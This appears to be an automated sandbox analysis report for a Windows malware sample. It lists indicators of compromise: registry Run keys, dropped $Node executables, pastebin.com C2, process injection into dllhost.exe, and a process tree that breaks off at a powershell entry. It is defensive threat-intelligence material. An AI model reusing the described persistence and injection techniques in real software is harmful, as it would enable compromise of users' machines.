d6c2f953a4c4b2f7bf58378855bbc3d38c1b4d686118ad899540e5778413788d

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wmiprvse.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\Control Panel\International\Geo\Nation	Node64.exe

Executes dropped EXE 3 IoCs

pid	Process
4880	$Node32.exe
3788	$Node2Json.exe
3280	$Node3Json.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe"	Node64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe"	Node64.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4074627901-37362009-3519777259-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe"	Node64.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
19	pastebin.com
20	pastebin.com
24	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Drops file in System32 directory 22 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\System32\$Node2Json.exe	Node64.exe
File opened for modification	C:\Windows\System32\$Node3Json.exe	Node64.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\$Node32.exe	Node64.exe
File created	C:\Windows\System32\$Node2Json.exe	Node64.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\System32\$Node32.exe	Node64.exe
File created	C:\Windows\System32\$Node3Json.exe	Node64.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1300 set thread context of 324	1300	powershell.EXE	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$Node32.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={C2C5C930-ED4B-4A58-B011-C97B23288330}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek	mousocoreworker.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "001840102DE3EC6A"	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "001840102DE3EC6A"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000f568195fd89c2d45ba66f134061263750000000002000000000010660000000100002000000022d465a17fc2e82f2fd8ae421ebad4037396ebdfcfd8dd9acef6db86bffe820c000000000e800000000200002000000058bb1295083f924879b43722f305d729a2db8740fed5f8b82dbc5bd4cbf3f612b0030000436836fc0b8f1fe3a53c9c92287cc8ef0b410e69049375af493efd17a413771f0af75056bf8a33ab32d5809b4cb3005a49ea779f2150bf599d8e745ebf3a2d60bbf1158cd9b6c6982468ce7349d208f73cb60a7d5cdd1520197209aed1bda07963afce3cb43b47fafd50a4076e27886c1e2913067e85ae2514028dec95f0c7e4aa895f0de028a834c4e605f1ecfb73711050ec2ce83fcd0a7715d594ec7970d88a10b147f82648785cec8a1cdb9852bd319d5dbf8504dccd165c1be0a852c38a65fa749695e6f7ee10e534ddf256f6173e4b9cc41f089cbbe9d1496c5f03244938474f635ee13fd9151a6caef0728e6931ef5a9836254c78edf5f54b1c8b9faa5e8a452050437eaa5433ce113de64be95c62d40a983768e3c5fe9e6726f047cffdc15e24afdd632ffe85807f0844cebb6e8a619ef1329d30b7fe3586a2f8b8b3bec2a0057302b49fdb9bea3f5bf9b51da29f1e084a83be85b9fe252b035832884f81d82524b3d3c3834b4a38c4f5b783d589f132bf7f9ab284045275903c97e991950ebf3835478f2cc643255efa6ed5a7f440da1fc6cffb3d2af467f2c6d97a1d847ace77a7bb54b4c062fc99ec113dd84929cd30d33627cd6dd7379cd8834fbfe1c33cc53386278bc48a74aec354fa54f424e680799ff98a031c9bd3bd9149c7c57aa28d9f21e533f7c660f9655d331ea93f345219e098fa01e31202b66b177489baba10d9c08325224842e2785ed09cd787f20be60b6b1e63af405ae8603300ff9039fea02f918d6069476206d810eaf4ff4c34e3c8eaea14f8bdec0aee4f8c1d566dbfee23183084bce8dcc207ed85c4bf1a864de8d1aa2442538098ba0549cbbdc91ac95f7ba1b8ccaf62f73e3c4a6965cd8e747ea1d37578bc45401d10ad0086911ab7436f6f16099f52afb3049cb5494ce4422280cb00084c5b2ed66e6050cdd6825a921f5993345eda6565878525a946da4f2921565f689d3ea1ab9911a686a162b4f953806fa7ee96dd35cc83ce86334110c956c0d4d4d03b1fdc85ffcb82f2504cf3cd7a44e290f7f9544425033f5a368735b08dcea3fd917d7c0ff14c5f5c8de436f0f15582a30e8d768d189d861bd30e18d580b1a7b2563801cc112072264f48ffb2ef03b30388b0cd17abc885e9dad26e29ace8ac379b67c724fab6e664c4097fd8e2c36235ba73ce56d2f23a98eb43deb65b9b30369f4722627a9478b37fe4ce982bae804d17fdd397149368b040195d9463e1e150962ddcc19a23095888a3aaa119c459d73edac9b4a2152317eabf96982d74aef0f601a02a97763e04d8d93364573e24f66a0bc33240000000f80e10c1d8ba925cb1d640d90623e36c858ac8a1eb5a9c14e6e3ccf39f5010b98dca39267b903408ffa164e95645de8fa4f637e8777d1df029f1aa34c1a0bbe6	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1380	schtasks.exe
1840	schtasks.exe
2288	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2064	powershell.exe
2064	powershell.exe
3964	powershell.exe
3964	powershell.exe
1300	powershell.EXE
1300	powershell.EXE
3464	powershell.exe
3464	powershell.exe
1300	powershell.EXE
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe
324	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2568	Node64.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeIncreaseQuotaPrivilege	2064	powershell.exe
Token: SeSecurityPrivilege	2064	powershell.exe
Token: SeTakeOwnershipPrivilege	2064	powershell.exe
Token: SeLoadDriverPrivilege	2064	powershell.exe
Token: SeSystemProfilePrivilege	2064	powershell.exe
Token: SeSystemtimePrivilege	2064	powershell.exe
Token: SeProfSingleProcessPrivilege	2064	powershell.exe
Token: SeIncBasePriorityPrivilege	2064	powershell.exe
Token: SeCreatePagefilePrivilege	2064	powershell.exe
Token: SeBackupPrivilege	2064	powershell.exe
Token: SeRestorePrivilege	2064	powershell.exe
Token: SeShutdownPrivilege	2064	powershell.exe
Token: SeDebugPrivilege	2064	powershell.exe
Token: SeSystemEnvironmentPrivilege	2064	powershell.exe
Token: SeRemoteShutdownPrivilege	2064	powershell.exe
Token: SeUndockPrivilege	2064	powershell.exe
Token: SeManageVolumePrivilege	2064	powershell.exe
Token: 33	2064	powershell.exe
Token: 34	2064	powershell.exe
Token: 35	2064	powershell.exe
Token: 36	2064	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	1300	powershell.EXE
Token: SeIncreaseQuotaPrivilege	3964	powershell.exe
Token: SeSecurityPrivilege	3964	powershell.exe
Token: SeTakeOwnershipPrivilege	3964	powershell.exe
Token: SeLoadDriverPrivilege	3964	powershell.exe
Token: SeSystemProfilePrivilege	3964	powershell.exe
Token: SeSystemtimePrivilege	3964	powershell.exe
Token: SeProfSingleProcessPrivilege	3964	powershell.exe
Token: SeIncBasePriorityPrivilege	3964	powershell.exe
Token: SeCreatePagefilePrivilege	3964	powershell.exe
Token: SeBackupPrivilege	3964	powershell.exe
Token: SeRestorePrivilege	3964	powershell.exe
Token: SeShutdownPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeSystemEnvironmentPrivilege	3964	powershell.exe
Token: SeRemoteShutdownPrivilege	3964	powershell.exe
Token: SeUndockPrivilege	3964	powershell.exe
Token: SeManageVolumePrivilege	3964	powershell.exe
Token: 33	3964	powershell.exe
Token: 34	3964	powershell.exe
Token: 35	3964	powershell.exe
Token: 36	3964	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeIncreaseQuotaPrivilege	3464	powershell.exe
Token: SeSecurityPrivilege	3464	powershell.exe
Token: SeTakeOwnershipPrivilege	3464	powershell.exe
Token: SeLoadDriverPrivilege	3464	powershell.exe
Token: SeSystemProfilePrivilege	3464	powershell.exe
Token: SeSystemtimePrivilege	3464	powershell.exe
Token: SeProfSingleProcessPrivilege	3464	powershell.exe
Token: SeIncBasePriorityPrivilege	3464	powershell.exe
Token: SeCreatePagefilePrivilege	3464	powershell.exe
Token: SeBackupPrivilege	3464	powershell.exe
Token: SeRestorePrivilege	3464	powershell.exe
Token: SeShutdownPrivilege	3464	powershell.exe
Token: SeDebugPrivilege	3464	powershell.exe
Token: SeSystemEnvironmentPrivilege	3464	powershell.exe
Token: SeRemoteShutdownPrivilege	3464	powershell.exe
Token: SeUndockPrivilege	3464	powershell.exe
Token: SeManageVolumePrivilege	3464	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2568 wrote to memory of 2064	2568	Node64.exe	82
PID 2568 wrote to memory of 2064	2568	Node64.exe	82
PID 2568 wrote to memory of 1380	2568	Node64.exe	86
PID 2568 wrote to memory of 1380	2568	Node64.exe	86
PID 2568 wrote to memory of 4880	2568	Node64.exe	88
PID 2568 wrote to memory of 4880	2568	Node64.exe	88
PID 2568 wrote to memory of 4880	2568	Node64.exe	88
PID 2568 wrote to memory of 3964	2568	Node64.exe	89
PID 2568 wrote to memory of 3964	2568	Node64.exe	89
PID 2568 wrote to memory of 1840	2568	Node64.exe	94
PID 2568 wrote to memory of 1840	2568	Node64.exe	94
PID 2568 wrote to memory of 3788	2568	Node64.exe	96
PID 2568 wrote to memory of 3788	2568	Node64.exe	96
PID 2568 wrote to memory of 3464	2568	Node64.exe	97
PID 2568 wrote to memory of 3464	2568	Node64.exe	97
PID 2568 wrote to memory of 2288	2568	Node64.exe	99
PID 2568 wrote to memory of 2288	2568	Node64.exe	99
PID 2568 wrote to memory of 3280	2568	Node64.exe	101
PID 2568 wrote to memory of 3280	2568	Node64.exe	101
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 1300 wrote to memory of 324	1300	powershell.EXE	102
PID 324 wrote to memory of 628	324	dllhost.exe	5
PID 324 wrote to memory of 676	324	dllhost.exe	7
PID 324 wrote to memory of 964	324	dllhost.exe	12
PID 324 wrote to memory of 408	324	dllhost.exe	13
PID 324 wrote to memory of 400	324	dllhost.exe	14
PID 324 wrote to memory of 416	324	dllhost.exe	15
PID 324 wrote to memory of 764	324	dllhost.exe	16
PID 324 wrote to memory of 1040	324	dllhost.exe	17
PID 324 wrote to memory of 1072	324	dllhost.exe	18
PID 324 wrote to memory of 1176	324	dllhost.exe	19
PID 324 wrote to memory of 1248	324	dllhost.exe	21
PID 324 wrote to memory of 1264	324	dllhost.exe	22
PID 324 wrote to memory of 1444	324	dllhost.exe	23
PID 324 wrote to memory of 1460	324	dllhost.exe	24
PID 324 wrote to memory of 1476	324	dllhost.exe	25
PID 324 wrote to memory of 1516	324	dllhost.exe	26
PID 324 wrote to memory of 1540	324	dllhost.exe	27
PID 324 wrote to memory of 1644	324	dllhost.exe	28
PID 324 wrote to memory of 1680	324	dllhost.exe	29
PID 324 wrote to memory of 1736	324	dllhost.exe	30
PID 324 wrote to memory of 1768	324	dllhost.exe	31
PID 324 wrote to memory of 1848	324	dllhost.exe	32
PID 324 wrote to memory of 1912	324	dllhost.exe	33
PID 324 wrote to memory of 1924	324	dllhost.exe	34
PID 324 wrote to memory of 1940	324	dllhost.exe	35
PID 324 wrote to memory of 2012	324	dllhost.exe	36
PID 324 wrote to memory of 1700	324	dllhost.exe	37
PID 324 wrote to memory of 2140	324	dllhost.exe	38
PID 324 wrote to memory of 2248	324	dllhost.exe	40
PID 324 wrote to memory of 2348	324	dllhost.exe	41
PID 324 wrote to memory of 2404	324	dllhost.exe	42
PID 324 wrote to memory of 2456	324	dllhost.exe	43
PID 324 wrote to memory of 2468	324	dllhost.exe	44
PID 324 wrote to memory of 2560	324	dllhost.exe	45
PID 324 wrote to memory of 2648	324	dllhost.exe	46
PID 324 wrote to memory of 2672	324	dllhost.exe	47
PID 324 wrote to memory of 2688	324	dllhost.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:628
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1040
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{f2983257-2dd5-4945-ba26-cc09f94ee010}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:324

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:408

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:416

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1072

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1176

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1264
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3180
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
